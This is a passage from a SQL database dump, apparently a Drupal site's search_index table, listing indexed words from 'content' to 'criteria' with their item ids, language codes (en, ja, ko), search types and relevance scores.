('content', 36, 'ja', 'help_search', 2),
('content', 36, 'ko', 'help_search', 2),
('content', 39, 'en', 'help_search', 1),
('content', 39, 'ja', 'help_search', 1),
('content', 39, 'ko', 'help_search', 1),
('content', 40, 'en', 'help_search', 28),
('content', 40, 'ja', 'help_search', 28),
('content', 40, 'ko', 'help_search', 28),
('content', 41, 'en', 'help_search', 6),
('content', 41, 'ja', 'help_search', 6),
('content', 41, 'ko', 'help_search', 6),
('content', 43, 'en', 'help_search', 4.98087),
('content', 43, 'ja', 'help_search', 4.98087),
('content', 43, 'ko', 'help_search', 4.98087),
('content', 44, 'en', 'help_search', 3),
('content', 44, 'ja', 'help_search', 3),
('content', 44, 'ko', 'help_search', 3),
('content', 47, 'en', 'help_search', 62),
('content', 47, 'ja', 'help_search', 62),
('content', 47, 'ko', 'help_search', 62),
('content', 50, 'en', 'help_search', 1),
('content', 50, 'ja', 'help_search', 1),
('content', 50, 'ko', 'help_search', 1),
('content', 54, 'en', 'help_search', 4),
('content', 54, 'ja', 'help_search', 4),
('content', 54, 'ko', 'help_search', 4),
('content', 55, 'en', 'help_search', 33),
('content', 55, 'ja', 'help_search', 33),
('content', 55, 'ko', 'help_search', 33),
('content', 56, 'en', 'help_search', 3),
('content', 56, 'ja', 'help_search', 3),
('content', 56, 'ko', 'help_search', 3),
('content', 59, 'en', 'help_search', 99.8792),
('content', 59, 'ja', 'help_search', 99.8792),
('content', 59, 'ko', 'help_search', 99.8792),
('content', 60, 'en', 'help_search', 88),
('content', 60, 'ja', 'help_search', 88),
('content', 60, 'ko', 'help_search', 88),
('content', 61, 'en', 'help_search', 107.333),
('content', 61, 'ja', 'help_search', 107.333),
('content', 61, 'ko', 'help_search', 107.333),
('content', 62, 'en', 'help_search', 105),
('content', 62, 'ja', 'help_search', 105),
('content', 62, 'ko', 'help_search', 105),
('content', 63, 'en', 'help_search', 43),
('content', 63, 'ja', 'help_search', 43),
('content', 63, 'ko', 'help_search', 43),
('content', 65, 'en', 'help_search', 4),
('content', 65, 'ja', 'help_search', 4),
('content', 65, 'ko', 'help_search', 4),
('content', 66, 'en', 'help_search', 8),
('content', 66, 'ja', 'help_search', 8),
('content', 67, 'en', 'help_search', 7.89272),
('content', 67, 'ja', 'help_search', 7.89272),
('content', 67, 'ko', 'help_search', 7.89272),
('content', 68, 'en', 'help_search', 8.21653),
('content', 68, 'ja', 'help_search', 8.21653),
('content', 68, 'ko', 'help_search', 8.21653),
('content', 72, 'en', 'help_search', 1),
('content', 72, 'ja', 'help_search', 1),
('content', 72, 'ko', 'help_search', 1),
('content', 75, 'en', 'help_search', 1),
('content', 75, 'ja', 'help_search', 1),
('content', 75, 'ko', 'help_search', 1),
('content', 79, 'en', 'help_search', 3),
('content', 79, 'ja', 'help_search', 3),
('content', 79, 'ko', 'help_search', 3),
('content', 80, 'en', 'help_search', 11.9596),
('content', 80, 'ja', 'help_search', 11.9596),
('content', 80, 'ko', 'help_search', 11.9596),
('content', 84, 'en', 'help_search', 2),
('content', 84, 'ja', 'help_search', 2),
('content', 84, 'ko', 'help_search', 2),
('content', 86, 'en', 'help_search', 1.98902),
('content', 86, 'ja', 'help_search', 1.98902),
('content', 86, 'ko', 'help_search', 1.98902),
('content', 87, 'en', 'help_search', 1),
('content', 87, 'ja', 'help_search', 1),
('content', 87, 'ko', 'help_search', 1),
('content', 90, 'en', 'help_search', 1),
('content', 90, 'ja', 'help_search', 1),
('content', 90, 'ko', 'help_search', 1),
('content', 91, 'en', 'help_search', 1),
('content', 91, 'ja', 'help_search', 1),
('content', 91, 'ko', 'help_search', 1),
('content', 92, 'en', 'help_search', 38),
('content', 92, 'ja', 'help_search', 38),
('content', 92, 'ko', 'help_search', 38),
('content', 93, 'en', 'help_search', 31.6669),
('content', 93, 'ja', 'help_search', 31.6669),
('content', 93, 'ko', 'help_search', 31.6669),
('context', 37, 'en', 'help_search', 1),
('context', 37, 'ja', 'help_search', 1),
('context', 37, 'ko', 'help_search', 1),
('context', 93, 'en', 'help_search', 3.62515),
('context', 93, 'ja', 'help_search', 3.62515),
('context', 93, 'ko', 'help_search', 3.62515),
('contextual', 22, 'en', 'help_search', 66),
('contextual', 22, 'ja', 'help_search', 66),
('contextual', 22, 'ko', 'help_search', 66),
('contextual', 39, 'en', 'help_search', 9),
('contextual', 39, 'ja', 'help_search', 9),
('contextual', 39, 'ko', 'help_search', 9),
('contextual', 43, 'en', 'help_search', 1),
('contextual', 43, 'ja', 'help_search', 1),
('contextual', 43, 'ko', 'help_search', 1),
('contextual', 93, 'en', 'help_search', 3.70972),
('contextual', 93, 'ja', 'help_search', 3.70972),
('contextual', 93, 'ko', 'help_search', 3.70972),
('continue', 24, 'en', 'help_search', 4),
('continue', 24, 'ja', 'help_search', 4),
('continue', 24, 'ko', 'help_search', 4),
('continue', 27, 'en', 'help_search', 4),
('continue', 27, 'ja', 'help_search', 4),
('continue', 27, 'ko', 'help_search', 4),
('continue', 32, 'en', 'help_search', 1),
('continue', 32, 'ja', 'help_search', 1),
('continue', 32, 'ko', 'help_search', 1),
('continue', 79, 'en', 'help_search', 1),
('continue', 79, 'ja', 'help_search', 1),
('continue', 79, 'ko', 'help_search', 1),
('continue', 116, 'en', 'node_search', 1),
('continue', 140, 'en', 'node_search', 1),
('continue', 154, 'en', 'node_search', 1),
('continue', 165, 'en', 'node_search', 1),
('continue', 174, 'en', 'node_search', 1),
('continue', 176, 'en', 'node_search', 1),
('continue', 182, 'en', 'node_search', 1),
('continue', 183, 'en', 'node_search', 1),
('continue', 187, 'en', 'node_search', 1),
('continue', 197, 'en', 'node_search', 1),
('continued', 80, 'en', 'node_search', 1),
('continued', 140, 'en', 'node_search', 1),
('continued', 160, 'en', 'node_search', 1),
('continued', 161, 'en', 'node_search', 1),
('continued', 168, 'en', 'node_search', 1),
('continued', 175, 'en', 'node_search', 1),
('continued', 178, 'en', 'node_search', 1),
('continued', 179, 'en', 'node_search', 1),
('continued', 181, 'en', 'node_search', 1),
('continued', 183, 'en', 'node_search', 1),
('continued', 184, 'en', 'node_search', 1),
('continued', 186, 'en', 'node_search', 1),
('continued', 188, 'en', 'node_search', 1),
('continued', 189, 'en', 'node_search', 1),
('continued', 191, 'en', 'node_search', 1),
('continued', 193, 'en', 'node_search', 1),
('continued', 194, 'en', 'node_search', 1),
('continued', 196, 'en', 'node_search', 1),
('continued', 198, 'en', 'node_search', 1),
('continues', 27, 'en', 'node_search', 1),
('continues', 185, 'en', 'node_search', 1),
('continuing', 195, 'en', 'node_search', 1),
('continuous', 182, 'en', 'node_search', 1),
('continuous', 192, 'en', 'node_search', 1),
('continuous', 196, 'en', 'node_search', 1),
('continuously', 87, 'en', 'node_search', 1),
('contractor', 27, 'en', 'node_search', 0.769219),
('contribute', 165, 'en', 'node_search', 1),
('contribute', 176, 'en', 'node_search', 1),
('contributed', 11, 'en', 'help_search', 0.980874),
('contributed', 11, 'ja', 'help_search', 0.980874),
('contributed', 11, 'ko', 'help_search', 0.980874),
('contributed', 22, 'en', 'help_search', 1),
('contributed', 22, 'ja', 'help_search', 1),
('contributed', 22, 'ko', 'help_search', 1),
('contributed', 23, 'en', 'help_search', 1),
('contributed', 23, 'ja', 'help_search', 1),
('contributed', 23, 'ko', 'help_search', 1),
('contributed', 29, 'en', 'help_search', 4),
('contributed', 29, 'ja', 'help_search', 4),
('contributed', 29, 'ko', 'help_search', 4),
('contributed', 31, 'ja', 'help_search', 1.49425),
('contributed', 33, 'en', 'help_search', 5),
('contributed', 33, 'ja', 'help_search', 5),
('contributed', 33, 'ko', 'help_search', 5),
('contributed', 35, 'en', 'help_search', 1),
('contributed', 35, 'ja', 'help_search', 1),
('contributed', 35, 'ko', 'help_search', 1),
('contributed', 38, 'en', 'help_search', 2),
('contributed', 38, 'ja', 'help_search', 2),
('contributed', 38, 'ko', 'help_search', 2),
('contributed', 39, 'en', 'help_search', 1),
('contributed', 39, 'ja', 'help_search', 1),
('contributed', 39, 'ko', 'help_search', 1),
('contributed', 43, 'en', 'help_search', 3.8775),
('contributed', 43, 'ja', 'help_search', 3.8775),
('contributed', 43, 'ko', 'help_search', 3.8775),
('contributed', 44, 'en', 'help_search', 1),
('contributed', 44, 'ja', 'help_search', 1),
('contributed', 44, 'ko', 'help_search', 1),
('contributed', 46, 'en', 'help_search', 1),
('contributed', 46, 'ja', 'help_search', 1),
('contributed', 46, 'ko', 'help_search', 1),
('contributed', 59, 'en', 'help_search', 1),
('contributed', 59, 'ja', 'help_search', 1),
('contributed', 59, 'ko', 'help_search', 1),
('contributed', 61, 'en', 'help_search', 1),
('contributed', 61, 'ja', 'help_search', 1),
('contributed', 61, 'ko', 'help_search', 1),
('contributed', 62, 'en', 'help_search', 1),
('contributed', 62, 'ja', 'help_search', 1),
('contributed', 62, 'ko', 'help_search', 1),
('contributed', 65, 'en', 'help_search', 1),
('contributed', 65, 'ja', 'help_search', 1),
('contributed', 65, 'ko', 'help_search', 1),
('contributed', 68, 'en', 'help_search', 3),
('contributed', 68, 'ja', 'help_search', 3),
('contributed', 68, 'ko', 'help_search', 3),
('contributed', 69, 'en', 'help_search', 1),
('contributed', 69, 'ja', 'help_search', 1),
('contributed', 69, 'ko', 'help_search', 1),
('contributed', 74, 'en', 'help_search', 1),
('contributed', 74, 'ja', 'help_search', 1),
('contributed', 74, 'ko', 'help_search', 1),
('contributed', 77, 'en', 'help_search', 1),
('contributed', 77, 'ja', 'help_search', 1),
('contributed', 77, 'ko', 'help_search', 1),
('contributed', 81, 'en', 'help_search', 1),
('contributed', 81, 'ja', 'help_search', 1),
('contributed', 81, 'ko', 'help_search', 1),
('contributed', 93, 'en', 'help_search', 1),
('contributed', 93, 'ja', 'help_search', 1),
('contributed', 93, 'ko', 'help_search', 1),
('contributed', 178, 'en', 'node_search', 1),
('contributing', 169, 'en', 'node_search', 1),
('contribution', 188, 'en', 'node_search', 1),
('control', 59, 'en', 'help_search', 4),
('control', 59, 'ja', 'help_search', 4),
('control', 59, 'ko', 'help_search', 4),
('control', 61, 'en', 'help_search', 4),
('control', 61, 'ja', 'help_search', 4),
('control', 61, 'ko', 'help_search', 4),
('convenient', 30, 'en', 'node_search', 1),
('conventional', 162, 'en', 'node_search', 1),
('conversation', 138, 'en', 'node_search', 1),
('convert', 28, 'en', 'help_search', 2),
('convert', 28, 'ja', 'help_search', 2),
('convert', 28, 'ko', 'help_search', 2),
('converted', 37, 'en', 'help_search', 0.957226),
('converted', 37, 'ja', 'help_search', 0.957226),
('converted', 37, 'ko', 'help_search', 0.957226),
('converting', 28, 'en', 'help_search', 1),
('converting', 28, 'ja', 'help_search', 1),
('converting', 28, 'ko', 'help_search', 1),
('converting', 44, 'en', 'help_search', 1),
('converting', 44, 'ja', 'help_search', 1),
('converting', 44, 'ko', 'help_search', 1),
('converts', 28, 'en', 'help_search', 1),
('converts', 28, 'ja', 'help_search', 1),
('converts', 28, 'ko', 'help_search', 1),
('cookies', 31, 'ja', 'help_search', 1),
('cooking', 80, 'en', 'help_search', 1),
('cooking', 80, 'ja', 'help_search', 1),
('cooking', 80, 'ko', 'help_search', 1),
('coopening', 24, 'en', 'node_search', 1),
('cooperate', 27, 'en', 'node_search', 0.659351),
('cooperated', 69, 'en', 'node_search', 1),
('cooperation', 28, 'en', 'node_search', 28),
('coordinator', 30, 'en', 'node_search', 1),
('copied', 13, 'en', 'help_search', 1),
('copied', 13, 'ja', 'help_search', 1),
('copied', 13, 'ko', 'help_search', 1),
('copied', 30, 'en', 'help_search', 0.851346),
('copied', 30, 'ja', 'help_search', 0.851346),
('copied', 30, 'ko', 'help_search', 0.851346),
('copy', 13, 'en', 'help_search', 1),
('copy', 13, 'ja', 'help_search', 1),
('copy', 13, 'ko', 'help_search', 1),
('copy', 15, 'en', 'help_search', 1),
('copy', 15, 'ja', 'help_search', 1),
('copy', 15, 'ko', 'help_search', 1),
('copy', 32, 'en', 'help_search', 1),
('copy', 32, 'ja', 'help_search', 1),
('copy', 32, 'ko', 'help_search', 1),
('core', 8, 'en', 'help_search', 1),
('core', 8, 'ja', 'help_search', 1),
('core', 8, 'ko', 'help_search', 1),
('core', 11, 'en', 'help_search', 2.79901),
('core', 11, 'ja', 'help_search', 2.79901),
('core', 11, 'ko', 'help_search', 2.79901),
('core', 20, 'en', 'help_search', 1),
('core', 20, 'ja', 'help_search', 1),
('core', 20, 'ko', 'help_search', 1),
('core', 22, 'en', 'help_search', 2),
('core', 22, 'ja', 'help_search', 2),
('core', 22, 'ko', 'help_search', 2),
('core', 23, 'en', 'help_search', 2),
('core', 23, 'ja', 'help_search', 2),
('core', 23, 'ko', 'help_search', 2),
('core', 28, 'en', 'help_search', 3.81085),
('core', 28, 'ja', 'help_search', 3.81085),
('core', 28, 'ko', 'help_search', 3.81085),
('core', 29, 'en', 'help_search', 6.95772),
('core', 29, 'ja', 'help_search', 6.95772),
('core', 29, 'ko', 'help_search', 6.95772),
('core', 30, 'en', 'help_search', 1.70451),
('core', 30, 'ja', 'help_search', 1.70451),
('core', 30, 'ko', 'help_search', 1.70451),
('core', 31, 'ja', 'help_search', 9.59002),
('core', 32, 'en', 'help_search', 1.99731),
('core', 32, 'ja', 'help_search', 1.99731),
('core', 32, 'ko', 'help_search', 1.99731),
('core', 33, 'en', 'help_search', 6),
('core', 33, 'ja', 'help_search', 6),
('core', 33, 'ko', 'help_search', 6),
('core', 34, 'en', 'help_search', 1),
('core', 34, 'ja', 'help_search', 1),
('core', 34, 'ko', 'help_search', 1),
('core', 35, 'en', 'help_search', 7.99461),
('core', 35, 'ja', 'help_search', 7.99461),
('core', 35, 'ko', 'help_search', 7.99461),
('core', 36, 'en', 'help_search', 2),
('core', 36, 'ja', 'help_search', 2),
('core', 36, 'ko', 'help_search', 2),
('core', 37, 'en', 'help_search', 1),
('core', 37, 'ja', 'help_search', 1),
('core', 37, 'ko', 'help_search', 1),
('core', 38, 'en', 'help_search', 3),
('core', 38, 'ja', 'help_search', 3),
('core', 38, 'ko', 'help_search', 3),
('core', 39, 'en', 'help_search', 4),
('core', 39, 'ja', 'help_search', 4),
('core', 39, 'ko', 'help_search', 4),
('core', 40, 'en', 'help_search', 1),
('core', 40, 'ja', 'help_search', 1),
('core', 40, 'ko', 'help_search', 1),
('core', 41, 'en', 'help_search', 4),
('core', 41, 'ja', 'help_search', 4),
('core', 41, 'ko', 'help_search', 4),
('core', 42, 'en', 'help_search', 1.98493),
('core', 42, 'ja', 'help_search', 1.98493),
('core', 42, 'ko', 'help_search', 1.98493),
('core', 43, 'en', 'help_search', 7.88282),
('core', 43, 'ja', 'help_search', 7.88282),
('core', 43, 'ko', 'help_search', 7.88282),
('core', 44, 'en', 'help_search', 1),
('core', 44, 'ja', 'help_search', 1),
('core', 44, 'ko', 'help_search', 1),
('core', 45, 'en', 'help_search', 1),
('core', 45, 'ja', 'help_search', 1),
('core', 45, 'ko', 'help_search', 1),
('core', 46, 'en', 'help_search', 6.98902),
('core', 46, 'ja', 'help_search', 6.98902),
('core', 46, 'ko', 'help_search', 6.98902),
('core', 47, 'en', 'help_search', 1),
('core', 47, 'ja', 'help_search', 1),
('core', 47, 'ko', 'help_search', 1),
('core', 49, 'en', 'help_search', 1),
('core', 49, 'ja', 'help_search', 1),
('core', 49, 'ko', 'help_search', 1),
('core', 53, 'en', 'help_search', 1),
('core', 53, 'ja', 'help_search', 1),
('core', 53, 'ko', 'help_search', 1),
('core', 57, 'en', 'help_search', 1),
('core', 57, 'ja', 'help_search', 1),
('core', 57, 'ko', 'help_search', 1),
('core', 60, 'en', 'help_search', 3),
('core', 60, 'ja', 'help_search', 3),
('core', 60, 'ko', 'help_search', 3),
('core', 62, 'en', 'help_search', 3),
('core', 62, 'ja', 'help_search', 3),
('core', 62, 'ko', 'help_search', 3),
('core', 65, 'en', 'help_search', 2),
('core', 65, 'ja', 'help_search', 2),
('core', 65, 'ko', 'help_search', 2),
('core', 67, 'en', 'help_search', 1),
('core', 67, 'ja', 'help_search', 1),
('core', 67, 'ko', 'help_search', 1),
('core', 68, 'en', 'help_search', 26.7867),
('core', 68, 'ja', 'help_search', 26.7867),
('core', 68, 'ko', 'help_search', 26.7867),
('core', 69, 'en', 'help_search', 4),
('core', 69, 'ja', 'help_search', 4),
('core', 69, 'ko', 'help_search', 4),
('core', 72, 'en', 'help_search', 1),
('core', 72, 'ja', 'help_search', 1),
('core', 72, 'ko', 'help_search', 1),
('core', 74, 'en', 'help_search', 1),
('core', 74, 'ja', 'help_search', 1),
('core', 74, 'ko', 'help_search', 1),
('core', 76, 'en', 'help_search', 4),
('core', 76, 'ja', 'help_search', 4),
('core', 76, 'ko', 'help_search', 4),
('core', 77, 'en', 'help_search', 1),
('core', 77, 'ja', 'help_search', 1),
('core', 77, 'ko', 'help_search', 1),
('core', 79, 'en', 'help_search', 1),
('core', 79, 'ja', 'help_search', 1),
('core', 79, 'ko', 'help_search', 1),
('core', 80, 'en', 'help_search', 1.8881),
('core', 80, 'ja', 'help_search', 1.8881),
('core', 80, 'ko', 'help_search', 1.8881),
('core', 81, 'en', 'help_search', 4),
('core', 81, 'ja', 'help_search', 4),
('core', 81, 'ko', 'help_search', 4),
('core', 84, 'en', 'help_search', 2),
('core', 84, 'ja', 'help_search', 2),
('core', 84, 'ko', 'help_search', 2),
('core', 89, 'en', 'help_search', 2),
('core', 89, 'ja', 'help_search', 2),
('core', 89, 'ko', 'help_search', 2),
('core', 93, 'en', 'help_search', 2.41392),
('core', 93, 'ja', 'help_search', 2.41392),
('core', 93, 'ko', 'help_search', 2.41392),
('corner', 22, 'en', 'help_search', 1),
('corner', 22, 'ja', 'help_search', 1),
('corner', 22, 'ko', 'help_search', 1),
('corner', 39, 'en', 'help_search', 1),
('corner', 39, 'ja', 'help_search', 1),
('corner', 39, 'ko', 'help_search', 1),
('correct', 18, 'en', 'help_search', 1),
('correct', 18, 'ja', 'help_search', 1),
('correct', 18, 'ko', 'help_search', 1),
('correct', 20, 'en', 'help_search', 1),
('correct', 20, 'ja', 'help_search', 1),
('correct', 20, 'ko', 'help_search', 1),
('correct', 28, 'en', 'help_search', 1.83353),
('correct', 28, 'ja', 'help_search', 1.83353),
('correct', 28, 'ko', 'help_search', 1.83353),
('correct', 50, 'en', 'help_search', 0.961087),
('correct', 50, 'ja', 'help_search', 0.961087),
('correct', 50, 'ko', 'help_search', 0.961087),
('correct', 52, 'en', 'help_search', 1),
('correct', 52, 'ja', 'help_search', 1),
('correct', 52, 'ko', 'help_search', 1),
('correct', 56, 'en', 'help_search', 2),
('correct', 56, 'ja', 'help_search', 2),
('correct', 56, 'ko', 'help_search', 2),
('correct', 64, 'en', 'help_search', 1),
('correct', 64, 'ja', 'help_search', 1),
('correct', 64, 'ko', 'help_search', 1),
('correct', 66, 'en', 'help_search', 2),
('correct', 66, 'ja', 'help_search', 2),
('correct', 82, 'en', 'help_search', 1),
('correct', 82, 'ja', 'help_search', 1),
('correct', 82, 'ko', 'help_search', 1),
('correct', 86, 'en', 'help_search', 0.976851),
('correct', 86, 'ja', 'help_search', 0.976851),
('correct', 86, 'ko', 'help_search', 0.976851),
('correct', 91, 'en', 'help_search', 1),
('correct', 91, 'ja', 'help_search', 1),
('correct', 91, 'ko', 'help_search', 1),
('corresponding', 22, 'en', 'help_search', 0.989021),
('corresponding', 22, 'ja', 'help_search', 0.989021),
('corresponding', 22, 'ko', 'help_search', 0.989021),
('corresponding', 43, 'en', 'help_search', 0.873132),
('corresponding', 43, 'ja', 'help_search', 0.873132),
('corresponding', 43, 'ko', 'help_search', 0.873132),
('corrupted', 67, 'en', 'help_search', 0.920273),
('corrupted', 67, 'ja', 'help_search', 0.920273),
('corrupted', 67, 'ko', 'help_search', 0.920273),
('cost', 27, 'en', 'node_search', 0.797402),
('cost', 31, 'en', 'node_search', 1),
('cost', 162, 'en', 'node_search', 0.96498),
('costs', 31, 'en', 'node_search', 1),
('could', 9, 'en', 'help_search', 1),
('could', 9, 'ja', 'help_search', 1),
('could', 9, 'ko', 'help_search', 1),
('could', 80, 'en', 'help_search', 6),
('could', 80, 'ja', 'help_search', 6),
('could', 80, 'ko', 'help_search', 6),
('could', 93, 'en', 'help_search', 0.824901),
('could', 93, 'ja', 'help_search', 0.824901),
('could', 93, 'ko', 'help_search', 0.824901),
('couldn', 3, 'en', 'node_search', 1),
('couldn', 3, 'ko', 'node_search', 1),
('counterparts', 30, 'en', 'help_search', 0.747619),
('counterparts', 30, 'ja', 'help_search', 0.747619),
('counterparts', 30, 'ko', 'help_search', 0.747619),
('countries', 23, 'en', 'node_search', 1.65314),
('countries', 24, 'en', 'node_search', 2.89608),
('country', 3, 'en', 'node_search', 1),
('country', 3, 'ko', 'node_search', 1),
('country', 71, 'en', 'help_search', 2),
('country', 71, 'ja', 'help_search', 2),
('country', 71, 'ko', 'help_search', 2),
('country', 150, 'en', 'node_search', 1),
('course', 31, 'en', 'node_search', 5),
('course', 62, 'en', 'node_search', 1.8034),
('course', 66, 'en', 'node_search', 8),
('course', 136, 'en', 'node_search', 1),
('course', 142, 'en', 'node_search', 1),
('course', 155, 'en', 'node_search', 8),
('courses', 23, 'en', 'node_search', 0.98493),
('courses', 24, 'en', 'node_search', 5.47473),
('courses', 28, 'en', 'node_search', 56),
('courses', 62, 'en', 'node_search', 2),
('courses', 66, 'en', 'node_search', 2),
('courses', 182, 'en', 'node_search', 1),
('covered', 38, 'en', 'help_search', 2),
('covered', 38, 'ja', 'help_search', 2),
('covered', 38, 'ko', 'help_search', 2),
('covered', 62, 'en', 'node_search', 1),
('covering', 133, 'en', 'node_search', 1),
('cpr', 150, 'en', 'node_search', 46),
('cpr', 150, 'ja', 'node_search', 46),
('create', 4, 'en', 'help_search', 2),
('create', 4, 'ja', 'help_search', 2),
('create', 4, 'ko', 'help_search', 2),
('create', 8, 'en', 'help_search', 21),
('create', 8, 'ja', 'help_search', 21),
('create', 8, 'ko', 'help_search', 21),
('create', 12, 'en', 'help_search', 1),
('create', 12, 'ja', 'help_search', 1),
('create', 12, 'ko', 'help_search', 1),
('create', 19, 'en', 'help_search', 1),
('create', 19, 'ja', 'help_search', 1),
('create', 19, 'ko', 'help_search', 1),
('create', 25, 'en', 'node_search', 1),
('create', 28, 'en', 'help_search', 0.920273),
('create', 28, 'ja', 'help_search', 0.920273),
('create', 28, 'ko', 'help_search', 0.920273),
('create', 29, 'en', 'help_search', 1),
('create', 29, 'ja', 'help_search', 1),
('create', 29, 'ko', 'help_search', 1),
('create', 30, 'en', 'help_search', 0.848323),
('create', 30, 'ja', 'help_search', 0.848323),
('create', 30, 'ko', 'help_search', 0.848323),
('create', 31, 'ja', 'help_search', 0.949597),
('create', 43, 'en', 'help_search', 1),
('create', 43, 'ja', 'help_search', 1),
('create', 43, 'ko', 'help_search', 1),
('create', 48, 'en', 'help_search', 4),
('create', 48, 'ja', 'help_search', 4),
('create', 48, 'ko', 'help_search', 4),
('create', 54, 'en', 'help_search', 5),
('create', 54, 'ja', 'help_search', 5),
('create', 54, 'ko', 'help_search', 5),
('create', 57, 'en', 'help_search', 1),
('create', 57, 'ja', 'help_search', 1),
('create', 57, 'ko', 'help_search', 1),
('create', 59, 'en', 'help_search', 26),
('create', 59, 'ja', 'help_search', 26),
('create', 59, 'ko', 'help_search', 26),
('create', 60, 'en', 'help_search', 21),
('create', 60, 'ja', 'help_search', 21),
('create', 60, 'ko', 'help_search', 21),
('create', 63, 'en', 'help_search', 26),
('create', 63, 'ja', 'help_search', 26),
('create', 63, 'ko', 'help_search', 26),
('create', 69, 'en', 'help_search', 1),
('create', 69, 'ja', 'help_search', 1),
('create', 69, 'ko', 'help_search', 1),
('create', 72, 'en', 'help_search', 2),
('create', 72, 'ja', 'help_search', 2),
('create', 72, 'ko', 'help_search', 2),
('create', 79, 'en', 'help_search', 1),
('create', 79, 'ja', 'help_search', 1),
('create', 79, 'ko', 'help_search', 1),
('create', 80, 'en', 'help_search', 0.942091),
('create', 80, 'ja', 'help_search', 0.942091),
('create', 80, 'ko', 'help_search', 0.942091);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('create', 82, 'en', 'help_search', 6),
('create', 82, 'ja', 'help_search', 6),
('create', 82, 'ko', 'help_search', 6),
('create', 83, 'en', 'help_search', 1),
('create', 83, 'ja', 'help_search', 1),
('create', 83, 'ko', 'help_search', 1),
('create', 90, 'en', 'help_search', 1),
('create', 90, 'ja', 'help_search', 1),
('create', 90, 'ko', 'help_search', 1),
('create', 92, 'en', 'help_search', 5),
('create', 92, 'ja', 'help_search', 5),
('create', 92, 'ko', 'help_search', 5),
('create', 93, 'en', 'help_search', 1.7974),
('create', 93, 'ja', 'help_search', 1.7974),
('create', 93, 'ko', 'help_search', 1.7974),
('created', 8, 'en', 'help_search', 1),
('created', 8, 'ja', 'help_search', 1),
('created', 8, 'ko', 'help_search', 1),
('created', 33, 'en', 'help_search', 1),
('created', 33, 'ja', 'help_search', 1),
('created', 33, 'ko', 'help_search', 1),
('created', 47, 'en', 'help_search', 1),
('created', 47, 'ja', 'help_search', 1),
('created', 47, 'ko', 'help_search', 1),
('created', 60, 'en', 'help_search', 1),
('created', 60, 'ja', 'help_search', 1),
('created', 60, 'ko', 'help_search', 1),
('created', 61, 'en', 'help_search', 2),
('created', 61, 'ja', 'help_search', 2),
('created', 61, 'ko', 'help_search', 2),
('created', 75, 'en', 'help_search', 1),
('created', 75, 'ja', 'help_search', 1),
('created', 75, 'ko', 'help_search', 1),
('created', 79, 'en', 'help_search', 3),
('created', 79, 'ja', 'help_search', 3),
('created', 79, 'ko', 'help_search', 3),
('created', 80, 'en', 'help_search', 1),
('created', 80, 'ja', 'help_search', 1),
('created', 80, 'ko', 'help_search', 1),
('created', 86, 'en', 'help_search', 29.989),
('created', 86, 'ja', 'help_search', 29.989),
('created', 86, 'ko', 'help_search', 29.989),
('created', 90, 'en', 'help_search', 1),
('created', 90, 'ja', 'help_search', 1),
('created', 90, 'ko', 'help_search', 1),
('created', 93, 'en', 'help_search', 0.876337),
('created', 93, 'ja', 'help_search', 0.876337),
('created', 93, 'ko', 'help_search', 0.876337),
('creates', 6, 'en', 'help_search', 1),
('creates', 6, 'ja', 'help_search', 1),
('creates', 6, 'ko', 'help_search', 1),
('creates', 23, 'en', 'help_search', 1),
('creates', 23, 'ja', 'help_search', 1),
('creates', 23, 'ko', 'help_search', 1),
('creates', 183, 'en', 'node_search', 1),
('creating', 4, 'en', 'help_search', 26),
('creating', 4, 'ja', 'help_search', 26),
('creating', 4, 'ko', 'help_search', 26),
('creating', 7, 'en', 'help_search', 1),
('creating', 7, 'ja', 'help_search', 1),
('creating', 7, 'ko', 'help_search', 1),
('creating', 8, 'en', 'help_search', 26),
('creating', 8, 'ja', 'help_search', 26),
('creating', 8, 'ko', 'help_search', 26),
('creating', 11, 'en', 'help_search', 0.896076),
('creating', 11, 'ja', 'help_search', 0.896076),
('creating', 11, 'ko', 'help_search', 0.896076),
('creating', 19, 'en', 'help_search', 26),
('creating', 19, 'ja', 'help_search', 26),
('creating', 19, 'ko', 'help_search', 26),
('creating', 24, 'en', 'help_search', 1),
('creating', 24, 'ja', 'help_search', 1),
('creating', 24, 'ko', 'help_search', 1),
('creating', 26, 'en', 'help_search', 1),
('creating', 26, 'en', 'node_search', 1),
('creating', 26, 'ja', 'help_search', 1),
('creating', 26, 'ko', 'help_search', 1),
('creating', 27, 'en', 'help_search', 1),
('creating', 27, 'ja', 'help_search', 1),
('creating', 27, 'ko', 'help_search', 1),
('creating', 36, 'en', 'help_search', 1),
('creating', 36, 'ja', 'help_search', 1),
('creating', 36, 'ko', 'help_search', 1),
('creating', 47, 'en', 'help_search', 1),
('creating', 47, 'ja', 'help_search', 1),
('creating', 47, 'ko', 'help_search', 1),
('creating', 57, 'en', 'help_search', 26),
('creating', 57, 'ja', 'help_search', 26),
('creating', 57, 'ko', 'help_search', 26),
('creating', 59, 'en', 'help_search', 37.8792),
('creating', 59, 'ja', 'help_search', 37.8792),
('creating', 59, 'ko', 'help_search', 37.8792),
('creating', 60, 'en', 'help_search', 26),
('creating', 60, 'ja', 'help_search', 26),
('creating', 60, 'ko', 'help_search', 26),
('creating', 63, 'en', 'help_search', 38),
('creating', 63, 'ja', 'help_search', 38),
('creating', 63, 'ko', 'help_search', 38),
('creating', 69, 'en', 'help_search', 26),
('creating', 69, 'ja', 'help_search', 26),
('creating', 69, 'ko', 'help_search', 26),
('creating', 82, 'en', 'help_search', 26),
('creating', 82, 'ja', 'help_search', 26),
('creating', 82, 'ko', 'help_search', 26),
('creating', 84, 'en', 'help_search', 1),
('creating', 84, 'ja', 'help_search', 1),
('creating', 84, 'ko', 'help_search', 1),
('creating', 86, 'en', 'help_search', 1),
('creating', 86, 'ja', 'help_search', 1),
('creating', 86, 'ko', 'help_search', 1),
('creating', 90, 'en', 'help_search', 26),
('creating', 90, 'ja', 'help_search', 26),
('creating', 90, 'ko', 'help_search', 26),
('creating', 91, 'en', 'help_search', 10.6579),
('creating', 91, 'ja', 'help_search', 10.6148),
('creating', 91, 'ko', 'help_search', 10.6579),
('creating', 93, 'en', 'help_search', 8.57154),
('creating', 93, 'ja', 'help_search', 8.57154),
('creating', 93, 'ko', 'help_search', 8.57154),
('creation', 86, 'en', 'help_search', 19),
('creation', 86, 'ja', 'help_search', 19),
('creation', 86, 'ko', 'help_search', 19),
('crew', 27, 'en', 'node_search', 0.681785),
('criteria', 91, 'en', 'help_search', 8),
('criteria', 91, 'ja', 'help_search', 8),
('criteria', 91, 'ko', 'help_search', 8),
('criteria', 93, 'en', 'help_search', 10.8666),
('criteria', 93, 'ja', 'help_search', 10.8666),
('criteria', 93, 'ko', 'help_search', 10.8666),
